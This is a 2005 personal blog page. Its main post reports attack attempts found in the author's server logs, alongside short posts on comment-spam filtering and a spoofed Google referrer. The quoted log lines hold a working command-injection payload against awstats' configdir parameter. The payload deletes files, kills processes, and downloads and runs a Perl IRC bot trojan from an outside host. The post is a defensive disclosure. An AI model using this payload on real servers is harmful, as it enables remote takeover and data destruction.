This page looks plain and unstyled because you're using a non-standard compliant browser. To see it in its best form, please upgrade to a browser that supports web standards. It's free and painless.

Paul's Time Sink

| Main | Albums |

potential security hole in awstats [updated]

Paul Westbrook | 08 July, 2005 22:03

I noticed the following entries in my log file:

66.139.73.109 - - [09/Jul/2005:00:01:37 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;
rm%20-rf%20a.txt*;echo| HTTP/1.1" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:38 -0700] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

It appears that this person is attempting to have awstats download a perl script and have it executed on the web server.  When I looked at the script that it is attempting to download, it attempts to connect to an irc server and sends information there. (ClamAV identifies this script as "Trojan.Perl.Shellbot.C")
 (More)

DNS Anti Spam plugin

Paul Westbrook | 08 July, 2005 20:09

I have just enabled the DNS Anti Spam plugin to catch comment spam that isn't stopped with the bayesian filter.  This plugin does some dns checks to determine if:

  1. The ip address is from a known spammer on sorbs.net, spamhaus.org, or dsbl.org.
  2. The title, body text, or the username has a url that is known to be sent out as spam at surbl.org
  3. The url is known to be sent out as spam at surbl.org

Technorati Tags: , ,

blog comment spam schedule?

Paul Westbrook | 08 July, 2005 15:39

I was curious about what type of comments were being caught in the bayesian spam filter that pLog has, so I change my setting to keep the spam messages (still marked as spam) instead of deleting them.  On thing that I noticed is that it appears that on the 27th minute after the hour, I batch of spam comments get posted.  (All of them are caught by the filter.)

If I have the 27th minute, I wonder who has the top of the hour.

Technorati Tags: , ,

Google as a referrer?

Paul Westbrook | 08 July, 2005 14:02

I have noticed someone doing something strange.  They have configured their browser to report the referrer as Google.

XXX.XX.XX.XX - - [08/Jul/2005:16:26:28 -0700] "GET /index.php?op=ViewArticle&articleId=492&blogId=2 HTTP/1.0" 200 28062 "http://www.google.com/" "Mozilla (X11; I; Linux 2.0.32 i586)"

I can't image that there are web servers that allow different content when the referrer is the home page of Google.  Especially since most valid referrers from Google will contain a the search query.  (I really doubt that I am listed on Google's main page.)

Powered by LifeType
Design by Book of Styles